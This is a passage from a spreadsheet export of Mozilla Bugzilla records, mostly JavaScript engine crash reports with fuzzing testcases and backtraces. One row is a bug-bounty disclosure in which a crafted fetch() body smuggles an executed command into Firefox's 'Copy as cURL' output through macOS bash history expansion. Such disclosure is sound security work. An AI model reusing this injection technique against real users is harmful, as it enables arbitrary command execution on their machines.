      </c>
      <c r="S5727" t="inlineStr">
        <is>
          <t>Firefox 60</t>
        </is>
      </c>
      <c r="T5727" t="n">
        <v>1</v>
      </c>
      <c r="U5727" t="n">
        <v>0</v>
      </c>
      <c r="V5727" t="n">
        <v>53</v>
      </c>
      <c r="W5727" t="inlineStr">
        <is>
          <t>Currently the code for the normandy client lives as a system add-on at browser/extensions/shield-recipe-client. Since we are planning to begin shipping system add-ons via Normandy (bug 1436111) it would be strange if Normandy itself was a system add-on.
The new path for the code should be toolkit/components/normandy. This means that normandy will be available to any product built from mozilla-central. We should make sure it is disabled by default in the build system, and enabled only where we want it. For now that is just Firefox Desktop, but in the future may also include Fennec.</t>
        </is>
      </c>
      <c r="X5727" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5728">
      <c r="A5728" t="n">
        <v>1518026</v>
      </c>
      <c r="B5728" t="inlineStr">
        <is>
          <t>2019-01-06 09:38:31 -0800</t>
        </is>
      </c>
      <c r="C5728" t="inlineStr">
        <is>
          <t>RCE via "copy as curl" on mac</t>
        </is>
      </c>
      <c r="D5728" t="inlineStr">
        <is>
          <t>2024-05-30 09:50:50 -0700</t>
        </is>
      </c>
      <c r="E5728" t="n">
        <v>1</v>
      </c>
      <c r="F5728" t="n">
        <v>1</v>
      </c>
      <c r="G5728" t="n">
        <v>3</v>
      </c>
      <c r="H5728" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5728" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J5728" t="inlineStr">
        <is>
          <t>Netmonitor</t>
        </is>
      </c>
      <c r="K5728" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5728" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5728" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5728" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5728" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5728" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]][adv-main66+]</t>
        </is>
      </c>
      <c r="Q5728" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5728" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5728" t="inlineStr">
        <is>
          <t>Firefox 66</t>
        </is>
      </c>
      <c r="T5728" t="n">
        <v>1</v>
      </c>
      <c r="U5728" t="n">
        <v>0</v>
      </c>
      <c r="V5728" t="n">
        <v>17</v>
      </c>
      <c r="W5728" t="inlineStr">
        <is>
          <t>Created attachment 9034609
curl.zip
VULNERABILITY DETAILS
Copypasting of curl requests from Firefox can produce RCE in MacOS.
For example we have such JS code:
fetch('https://google.com', {'body':'\'!ls:q:gs|ls|;ping 8.8.8.8;|', method:'POST'})
If we will copy it as curl we will get such bash command:
curl 'https://google.com/' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'content-type: text/plain;charset=UTF-8' -H 'origin: null' -H 'DNT: 1' -H 'Connection: keep-alive' --data $'\'!ls:q:gs|ls|;ping 8.8.8.8;|'
The interesting part is here:
$'\'!ls:q:gs|ls|;ping 8.8.8.8;|'
It is calling following command:
ping 8.8.8.8
But how?
The problem that mac uses old bash, and there is lack of some updates. And current mac version of bash has a problem with bash history expansions.
Our bash command will be actually interpreted interesting if some of our previous commands contained 'ls'. So we will have such request:
curl 'https://google.com/' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'content-type: text/plain;charset=UTF-8' -H 'origin: null' -H 'DNT: 1' -H 'Connection: keep-alive' --data $'\'';ping 8.8.8.8;''
Interesting part is here:
$'\'';ping 8.8.8.8;''
So you see that here our string transformed into executable bash code.
WHATS HAPPEN
First of all when I found this, I asked to fix it bash team, but they told me that it is not a vulnerability at all, so there is no CVE, and that it is fixed in newer bash (it is true), and they won't fix it for old versions.
Okay, I sent this information to Apple, and they fixed it... But I was slow and didn't check there fix. But later I checked fix. And the fix was strange... They fixed Safari inspector. So it looks like Apple actually doesn't think that it is a problem in Bash as I inderstand.
So I am sending report to Firefox team.
VERSION
Works only in MacOS in any version of Firefox.
REPRODUCTION CASE
I attached archieve with video showcase and HTML file.</t>
        </is>
      </c>
      <c r="X5728" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5729">
      <c r="A5729" t="n">
        <v>1329521</v>
      </c>
      <c r="B5729" t="inlineStr">
        <is>
          <t>2017-01-08 14:28:21 -0800</t>
        </is>
      </c>
      <c r="C5729" t="inlineStr">
        <is>
          <t>Private browsing flag assertion failures on debug builds in devtools / page info / browser console</t>
        </is>
      </c>
      <c r="D5729" t="inlineStr">
        <is>
          <t>2017-04-20 11:52:51 -0700</t>
        </is>
      </c>
      <c r="E5729" t="n">
        <v>1</v>
      </c>
      <c r="F5729" t="n">
        <v>1</v>
      </c>
      <c r="G5729" t="n">
        <v>2</v>
      </c>
      <c r="H5729" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5729" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5729" t="inlineStr">
        <is>
          <t>Page Info Window</t>
        </is>
      </c>
      <c r="K5729" t="inlineStr">
        <is>
          <t>53 Branch</t>
        </is>
      </c>
      <c r="L5729" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5729" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5729" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5729" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5729" t="inlineStr">
        <is>
          <t>[OA][adv-main53+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q5729" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5729" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5729" t="inlineStr">
        <is>
          <t>Firefox 53</t>
        </is>
      </c>
      <c r="T5729" t="n">
        <v>0</v>
      </c>
      <c r="U5729" t="n">
        <v>0</v>
      </c>
      <c r="V5729" t="n">
        <v>20</v>
      </c>
      <c r="W5729" t="inlineStr">
        <is>
          <t>Ive encountered multiple crashes in the newest nightly build involving the chrome level dev tools(gloabl console) and viewing page info.
First the page info problem as it is the easiest to reproduce.  For me when viewing any page and trying to view page info, ff crashes with the following for a stack trace:
Assertion failure: pb == (doa.mPrivateBrowsingId &gt; 0), at c:/Users/[redacted]/mozilla
-central/netwerk/base/LoadContextInfo.cpp:146
#01: mozilla::net::LoadContextInfoFactory::FromLoadContext (c:\users\[redacted]\mozil
la-central\netwerk\base\loadcontextinfo.cpp:100)
#02: _NS_InvokeByIndex (c:\Users\[redacted]\mozilla-central\xpcom\reflect\xptcall\md\
win32\xptcinvoke_asm_x86_msvc.asm:57)
#03: CallMethodHelper::Invoke (c:\users\[redacted]\mozilla-central\js\xpconnect\src\x
pcwrappednative.cpp:2058)
#04: CallMethodHelper::Call (c:\users\[redacted]\mozilla-central\js\xpconnect\src\xpc
wrappednative.cpp:1377)
#05: XPCWrappedNative::CallMethod (c:\users\[redacted]\mozilla-central\js\xpconnect\s
rc\xpcwrappednative.cpp:1344)
#06: XPC_WN_CallMethod (c:\users\[redacted]\mozilla-central\js\xpconnect\src\xpcwrapp
ednativejsops.cpp:999)
#07: js::CallJSNative (c:\users\[redacted]\mozilla-central\js\src\jscntxtinlines.h:23
9)
#08: js::InternalCallOrConstruct (c:\users\[redacted]\mozilla-central\js\src\vm\inter
preter.cpp:457)
#09: InternalCall (c:\users\[redacted]\mozilla-central\js\src\vm\interpreter.cpp:502)
#10: js::CallFromStack (c:\users\[redacted]\mozilla-central\js\src\vm\interpreter.cpp
:508)
#11: Interpret (c:\users\[redacted]\mozilla-central\js\src\vm\interpreter.cpp:2928)
#12: js::RunScript (c:\users\[redacted]\mozilla-central\js\src\vm\interpreter.cpp:403
)
#13: js::ExecuteKernel (c:\users\[redacted]\mozilla-central\js\src\vm\interpreter.cpp
:684)
#14: js::Execute (c:\users\[redacted]\mozilla-central\js\src\vm\interpreter.cpp:716)
#15: ExecuteScript (c:\users\[redacted]\mozilla-central\js\src\jsapi.cpp:4410)
#16: JS::CloneAndExecuteScript (c:\users\[redacted]\mozilla-central\js\src\jsapi.cpp:
4473)
#17: mozilla::dom::XULDocument::ExecuteScript (c:\users\[redacted]\mozilla-central\do
m\xul\xuldocument.cpp:3523)
#18: mozilla::dom::XULDocument::OnScriptCompileComplete (c:\users\[redacted]\mozilla-
central\dom\xul\xuldocument.cpp:3410)
#19: NotifyOffThreadScriptCompletedRunnable::Run (c:\users\[redacted]\mozilla-central
\dom\xul\nsxulelement.cpp:2813)
#20: nsThread::ProcessNextEvent (c:\users\[redacted]\mozilla-central\xpcom\threads\ns
thread.cpp:1240)
#21: NS_ProcessNextEvent (c:\users\[redacted]\mozilla-central\xpcom\glue\nsthreadutil
s.cpp:390)
#22: mozilla::ipc::MessagePump::Run (c:\users\[redacted]\mozilla-central\ipc\glue\mes
sagepump.cpp:124)
#23: MessageLoop::RunInternal (c:\users\[redacted]\mozilla-central\ipc\chromium\src\b
ase\message_loop.cc:239)
#24: MessageLoop::RunHandler (c:\users\[redacted]\mozilla-central\ipc\chromium\src\ba
se\message_loop.cc:232)
#25: MessageLoop::Run (c:\users\[redacted]\mozilla-central\ipc\chromium\src\base\mess
age_loop.cc:212)
#26: nsBaseAppShell::Run (c:\users\[redacted]\mozilla-central\widget\nsbaseappshell.c
pp:158)
#27: nsAppShell::Run (c:\users\[redacted]\mozilla-central\widget\windows\nsappshell.c
pp:262)
#28: nsAppStartup::Run (c:\users\[redacted]\mozilla-central\toolkit\components\startu
p\nsappstartup.cpp:283)
#29: XREMain::XRE_mainRun (c:\users\[redacted]\mozilla-central\toolkit\xre\nsapprunne
r.cpp:4494)
#30: XREMain::XRE_main (c:\users\[redacted]\mozilla-central\toolkit\xre\nsapprunner.c
pp:4623)
#31: XRE_main (c:\users\[redacted]\mozilla-central\toolkit\xre\nsapprunner.cpp:4714)
#32: do_main (c:\users\[redacted]\mozilla-central\browser\app\nsbrowserapp.cpp:319)
#33: NS_internal_main (c:\users\[redacted]\mozilla-central\browser\app\nsbrowserapp.c
pp:452)
#34: wmain (c:\users\[redacted]\mozilla-central\toolkit\xre\nswindowswmain.cpp:115)
#35: __scrt_common_main_seh (f:\dd\vctools\crt\vcstartup\src\startup\exe_common.
inl:253)
#36: BaseThreadInitThunk[C:\Windows\syswow64\kernel32.dll +0x1336a]
#37: RtlInitializeExceptionChain[C:\Windows\SysWOW64\ntdll.dll +0x39902]
#38: RtlInitializeExceptionChain[C:\Windows\SysWOW64\ntdll.dll +0x398d5]
Next, with any page open launch the global console (ctrl+shift+j) with chrome debugging enabled.  Type this into the global console, then click the resulting chrome window to get a stack trace like the following:
[Parent 5556] WARNING: CacheStorage has been disabled.: file c:/Users/[redacted]/mozi
lla-central/dom/cache/CacheStorage.cpp, line 149
Assertion failure: (principal-&gt;GetPrivateBrowsingId() &gt; 0) == IsPrivateBrowsing(
), at c:/Users/[redacted]/mozilla-central/dom/base/nsGlobalWindow.cpp:10680
#01: mozilla::dom::WindowBinding::get_sessionStorage (c:\users\[redacted]\mozilla-cen
tral\obj-i686-pc-mingw32\dom\bindings\windowbinding.cpp:15422)
#02: mozilla::dom::WindowBinding::genericGetter (c:\users\[redacted]\mozilla-central\
obj-i686-pc-mingw32\dom\bindings\windowbinding.cpp:15580)
#03: js::CallJSNative (c:\users\[redacted]\mozilla-central\js\src\jscntxtinlines.h:23
9)
#04: js::InternalCallOrConstruct (c:\users\[redacted]\mozilla-central\js\src\vm\inter
preter.cpp:457)
#05: InternalCall (c:\users\[redacted]\mozilla-central\js\src\vm\interpreter.cpp:502)
#06: js::Call (c:\users\[redacted]\mozilla-central\js\src\vm\interpreter.cpp:521)
#07: js::DebuggerObject::call (c:\users\[redacted]\mozilla-central\js\src\vm\debugger
.cpp:10239)
#08: js::DebuggerObject::callMethod (c:\users\[redacted]\mozilla-central\js\src\vm\de
bugger.cpp:9323)
#09: js::CallJSNative (c:\users\[redacted]\mozilla-central\js\src\jscntxtinlines.h:23
9)
#10: js::InternalCallOrConstruct (c:\users\[redacted]\mozilla-central\js\src\vm\inter
preter.cpp:457)
#11: InternalCall (c:\users\[redacted]\mozilla-central\js\src\vm\interpreter.cpp:502)
#12: js::Call (c:\users\[redacted]\mozilla-central\js\src\vm\interpreter.cpp:521)
#13: js::Wrapper::call (c:\users\[redacted]\mozilla-central\js\src\proxy\wrapper.cpp:
165)
#14: js::CrossCompartmentWrapper::call (c:\users\[redacted]\mozilla-central\js\src\pr
oxy\crosscompartmentwrapper.cpp:333)
#15: js::Proxy::call (c:\users\[redacted]\mozilla-central\js\src\proxy\proxy.cpp:421)
#16: js::proxy_Call (c:\users\[redacted]\mozilla-central\js\src\proxy\proxy.cpp:662)
#17: js::CallJSNative (c:\users\[redacted]\mozilla-central\js\src\jscntxtinlines.h:23
9)
#18: js::InternalCallOrConstruct (c:\users\[redacted]\mozilla-central\js\src\vm\inter
preter.cpp:445)
#19: InternalCall (c:\users\[redacted]\mozilla-central\js\src\vm\interpreter.cpp:502)
#20: js::CallFromStack (c:\users\[redacted]\mozilla-central\js\src\vm\interpreter.cpp
:508)
#21: js::jit::DoCallFallback (c:\users\[redacted]\mozilla-central\js\src\jit\baseline
ic.cpp:4396)
#22: ??? (???:???)
#23: ??? (???:???)
#24: ??? (???:???)
#25: EnterBaseline (c:\users\[redacted]\mozilla-central\js\src\jit\baselinejit.cpp:15
5)
#26: js::jit::EnterBaselineMethod (c:\users\[redacted]\mozilla-central\js\src\jit\bas
elinejit.cpp:195)
#27: js::RunScript (c:\users\[redacted]\mozilla-central\js\src\vm\interpreter.cpp:393
)
#28: js::InternalCallOrConstruct (c:\users\[redacted]\mozilla-central\js\src\vm\inter
preter.cpp:475)
#29: InternalCall (c:\users\[redacted]\mozilla-central\js\src\vm\interpreter.cpp:502)
#30: js::CallFromStack (c:\users\[redacted]\mozilla-central\js\src\vm\interpreter.cpp
:508)
#31: js::jit::DoCallFallback (c:\users\[redacted]\mozilla-central\js\src\jit\baseline
ic.cpp:4396)
#32: ??? (???:???)
#33: ??? (???:???)
#34: ??? (???:???)
[GPU 9044] WARNING: Shutting down GPU process early due to a crash!: file c:/Use
rs/[redacted]/mozilla-central/gfx/ipc/GPUParent.cpp, line 370
Making these private until someone can look at them because I haven't even begun to dig into debugging properly(have some slight issues with visual studio ugh)
I'll try to bring some follow up work with this soon.</t>
        </is>
      </c>
      <c r="X5729" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5730">
      <c r="A5730" t="n">
        <v>1114366</v>
      </c>
      <c r="B5730" t="inlineStr">
        <is>
          <t>2014-12-21 11:51:53 -0800</t>
        </is>
      </c>
      <c r="C5730" t="inlineStr">
        <is>
          <t>Add celerybeat-schedule to .gitignore</t>
        </is>
      </c>
      <c r="D5730" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E5730" t="n">
        <v>1</v>
      </c>
      <c r="F5730" t="n">
        <v>1</v>
      </c>
      <c r="G5730" t="n">
        <v>7</v>
      </c>
      <c r="H5730" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5730" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5730" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K5730" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5730" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5730" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5730" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5730" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5730" t="inlineStr"/>
      <c r="Q5730" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5730" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5730" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5730" t="n">
        <v>1</v>
      </c>
      <c r="U5730" t="n">
        <v>0</v>
      </c>
      <c r="V5730" t="n">
        <v>2</v>
      </c>
      <c r="W5730" t="inlineStr">
        <is>
          <t>(venv)vagrant@precise32:~/treeherder-service$ git status
...
# Untracked files:
#   (use "git add &lt;file&gt;..." to include in what will be committed)
#
#       celerybeat-schedule</t>
        </is>
      </c>
      <c r="X5730" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5731">
      <c r="A5731" t="n">
        <v>1233152</v>
      </c>
      <c r="B5731" t="inlineStr">
        <is>
          <t>2015-12-16 10:56:23 -0800</t>
        </is>
      </c>
      <c r="C5731" t="inlineStr">
        <is>
          <t>Crash [@ js::CompartmentChecker::fail] or Crash [@ compartment]</t>
        </is>
      </c>
      <c r="D5731" t="inlineStr">
        <is>
          <t>2016-09-22 14:41:46 -0700</t>
        </is>
      </c>
      <c r="E5731" t="n">
        <v>1</v>
      </c>
      <c r="F5731" t="n">
        <v>1</v>
      </c>
      <c r="G5731" t="n">
        <v>3</v>
      </c>
      <c r="H5731" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5731" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5731" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5731" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5731" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5731" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5731" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5731" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5731" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main44+][adv-esr38.6+]</t>
        </is>
      </c>
      <c r="Q5731" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5731" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5731" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T5731" t="n">
        <v>1</v>
      </c>
      <c r="U5731" t="n">
        <v>0</v>
      </c>
      <c r="V5731" t="n">
        <v>23</v>
      </c>
      <c r="W5731" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 749f9328dd76 (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-debug, run with --fuzzing-safe --thread-count=2):
gczeal(2, 10);
var g = newGlobal();
var elt = new g.Object;
g.offThreadCompileScript('debugger;', {
    element: elt,
});
var g = newGlobal();
g.runOffThreadScript();
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x00000000005c7ea0 in js::CompartmentChecker::fail (c1=&lt;optimized out&gt;, c2=&lt;optimized out&gt;) at js/src/jscntxtinlines.h:49
#0  0x00000000005c7ea0 in js::CompartmentChecker::fail (c1=&lt;optimized out&gt;, c2=&lt;optimized out&gt;) at js/src/jscntxtinlines.h:49
#1  0x00000000005c7ed5 in js::CompartmentChecker::check (this=&lt;optimized out&gt;, c=&lt;optimized out&gt;) at js/src/jscntxtinlines.h:70
#2  0x0000000000a19be7 in check (script=&lt;optimized out&gt;, this=0x7fffffffc740) at js/src/jscntxtinlines.h:130
#3  check&lt;JSScript*&gt; (rooted=..., this=0x7fffffffc740) at js/src/jscntxtinlines.h:86
#4  assertSameCompartment&lt;JS::Rooted&lt;JSScript*&gt; &gt; (t1=..., cx=0x7ffff6907400) at js/src/jscntxtinlines.h:162
#5  js::GlobalHelperThreadState::finishParseTask (this=&lt;optimized out&gt;, maybecx=maybecx@entry=0x7ffff6907400, rt=rt@entry=0x7ffff695d000, token=token@entry=0x7ffff46d76f0) at js/src/vm/HelperThreads.cpp:1052
#6  0x00000000008a895e in JS::FinishOffThreadScript (maybecx=maybecx@entry=0x7ffff6907400, rt=rt@entry=0x7ffff695d000, token=token@entry=0x7ffff46d76f0) at js/src/jsapi.cpp:4181
#7  0x0000000000487d43 in runOffThreadScript (cx=0x7ffff6907400, argc=&lt;optimized out&gt;, vp=0x7fffffffca48) at js/src/shell/js.cpp:3668
#8  0x0000000000a7d572 in js::CallJSNative (cx=0x7ffff6907400, native=0x487c90 &lt;runOffThreadScript(JSContext*, unsigned int, JS::Value*)&gt;, args=...) at js/src/jscntxtinlines.h:235
#9  0x0000000000a75b27 in js::Invoke (cx=cx@entry=0x7ffff6907400, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:444
#10 0x0000000000a767b9 in js::Invoke (cx=cx@entry=0x7ffff6907400, thisv=..., fval=..., argc=&lt;optimized out&gt;, argv=0x7ffff46710b0, rval=...) at js/src/vm/Interpreter.cpp:496
#11 0x000000000099c2e7 in js::DirectProxyHandler::call (this=this@entry=0x1babf10 &lt;js::CrossCompartmentWrapper::singleton&gt;, cx=cx@entry=0x7ffff6907400, proxy=..., proxy@entry=..., args=...) at js/src/proxy/DirectProxyHandler.cpp:77
#12 0x00000000009a3ab2 in js::CrossCompartmentWrapper::call (this=0x1babf10 &lt;js::CrossCompartmentWrapper::singleton&gt;, cx=0x7ffff6907400, wrapper=..., args=...) at js/src/proxy/CrossCompartmentWrapper.cpp:289
#13 0x00000000009a0852 in js::Proxy::call (cx=0x7ffff6907400, proxy=proxy@entry=..., args=...) at js/src/proxy/Proxy.cpp:391
#14 0x00000000009a0922 in js::proxy_Call (cx=&lt;optimized out&gt;, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at js/src/proxy/Proxy.cpp:683
#15 0x0000000000a7d572 in js::CallJSNative (cx=0x7ffff6907400, native=0x9a0870 &lt;js::proxy_Call(JSContext*, unsigned int, JS::Value*)&gt;, args=...) at js/src/jscntxtinlines.h:235
[...]
#27 main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;, envp=&lt;optimized out&gt;) at js/src/shell/js.cpp:6877
rax	0x0	0
rbx	0x7ffff6907400	140737330050048
rcx	0x7ffff6ca53cd	140737333842893
rdx	0x0	0
rsi	0x7ffff6f7a9d0	140737336814032
rdi	0x7ffff6f791c0	140737336807872
rbp	0x7fffffffc6f0	140737488340720
rsp	0x7fffffffc6f0	140737488340720
r8	0x7ffff7fe0780	140737354008448
r9	0x6372732f736a2f6c	7165916604736876396
r10	0x7fffffffc4b0	140737488340144
r11	0x7ffff6c27960	140737333328224
r12	0x7fffffffc740	140737488340800
r13	0x7fffffffc760	140737488340832
r14	0x7fffffffc780	140737488340864
r15	0x7ffff6907408	140737330050056
rip	0x5c7ea0 &lt;js::CompartmentChecker::fail(JSCompartment*, JSCompartment*)+48&gt;
=&gt; 0x5c7ea0 &lt;js::CompartmentChecker::fail(JSCompartment*, JSCompartment*)+48&gt;:	movl   $0x31,0x0
   0x5c7eab &lt;js::CompartmentChecker::fail(JSCompartment*, JSCompartment*)+59&gt;:	callq  0x4a3db0 &lt;abort()&gt;
This leads to a use-after-free according to the debug error message. However, it doesn't seem to be s-s because it requires the Debugger.</t>
        </is>
      </c>
      <c r="X5731" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5732">
      <c r="A5732" t="n">
        <v>1183153</v>
      </c>
      <c r="B5732" t="inlineStr">
        <is>
          <t>2015-07-13 09:10:32 -0700</t>
        </is>
      </c>
      <c r="C5732" t="inlineStr">
        <is>
          <t>Assertion failure: MIR instruction returned object with unexpected type, at js/src/jit/MacroAssembler.cpp:1789</t>
        </is>
      </c>
      <c r="D5732" t="inlineStr">
        <is>
          <t>2016-07-02 11:09:04 -0700</t>
        </is>
      </c>
      <c r="E5732" t="n">
        <v>1</v>
      </c>
      <c r="F5732" t="n">
        <v>1</v>
      </c>
      <c r="G5732" t="n">
        <v>3</v>
      </c>
      <c r="H5732" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5732" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5732" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5732" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5732" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5732" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5732" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5732" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5732" t="inlineStr">
        <is>
          <t>[jsbugmon:update][post-critsmash-triage][adv-main41+][adv-esr38.3+]</t>
        </is>
      </c>
      <c r="Q5732" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5732" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5732" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T5732" t="n">
        <v>1</v>
      </c>
      <c r="U5732" t="n">
        <v>0</v>
      </c>
      <c r="V5732" t="n">
        <v>23</v>
      </c>
      <c r="W5732" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision eab21ec484bb (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-debug, run with --fuzzing-safe --thread-count=2 --ion-eager --ion-offthread-compile=off):
gczeal(1);
var lfGlobal = newGlobal();
lfGlobal.offThreadCompileScript("(function* p() {});");
lfGlobal.runOffThreadScript();
Backtrace:
Program received signal SIGTRAP, Trace/breakpoint trap.
0x00007ffff7fd321d in ?? ()
#0  0x00007ffff7fd321d in ?? ()
#1  0x00007ffff7e7c060 in ?? ()
#2  0x00007ffff7fe8bcd in ?? ()
#3  0x0000000000000204 in ?? ()
#4  0x00007ffff7e9e12a in ?? ()
#5  0x0000000000000000 in ?? ()
rax	0x7ffff4800000	140737295417344
rbx	0x7ffff69811c0	140737330549184
rcx	0x7ffff7e91610	140737352635920
rdx	0x7fffffffbf28	140737488338728
rsi	0x7ffff7e00000	140737352040448
rdi	0x7fffffffb7e0	140737488336864
rbp	0x7fffffffb8e0	140737488337120
rsp	0x7fffffffb878	140737488337016
r8	0x0	0
r9	0x7ffff4800000	140737295417344
r10	0xc7ce0c7ce0c7ce0d	-4049285284472828403
r11	0x7ffff6c27960	140737333328224
r12	0x8	8
r13	0x7fffffffbf28	140737488338728
r14	0x204	516
r15	0x7fffffffbee0	140737488338656
rip	0x7ffff7fd321d	140737353953821
=&gt; 0x7ffff7fd321d:	push   %r10
   0x7ffff7fd321f:	push   %r9
Filing s-s because the test involves GC.</t>
        </is>
      </c>
      <c r="X5732" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5733">
      <c r="A5733" t="n">
        <v>561031</v>
      </c>
      <c r="B5733" t="inlineStr">
        <is>
          <t>2010-04-22 00:39:54 -0700</t>
        </is>
      </c>
      <c r="C5733" t="inlineStr">
        <is>
          <t>Crash [@ js_Interpret] or [@ JSScope::searchTable] or [@ js_LookupPropertyWithFlags] or "Assertion failure: cx-&gt;throwing, at ../jsops.cpp" or "Assertion failure: len &gt; 0, at ../jsops.cpp"</t>
        </is>
      </c>
      <c r="D5733" t="inlineStr">
        <is>
          <t>2013-01-04 15:57:10 -0800</t>
        </is>
      </c>
      <c r="E5733" t="n">
        <v>1</v>
      </c>
      <c r="F5733" t="n">
        <v>1</v>
      </c>
      <c r="G5733" t="n">
        <v>3</v>
      </c>
      <c r="H5733" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5733" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5733" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5733" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5733" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5733" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5733" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5733" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5733" t="inlineStr">
        <is>
          <t>[sg:critical?][ccbr][fixed-in-tracemonkey] [qa-examined-192]</t>
        </is>
      </c>
      <c r="Q5733" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5733" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5733" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5733" t="n">
        <v>1</v>
      </c>
      <c r="U5733" t="n">
        <v>0</v>
      </c>
      <c r="V5733" t="n">
        <v>31</v>
      </c>
      <c r="W5733" t="inlineStr">
        <is>
          <t>Created attachment 440713
1821-line reduced testcase
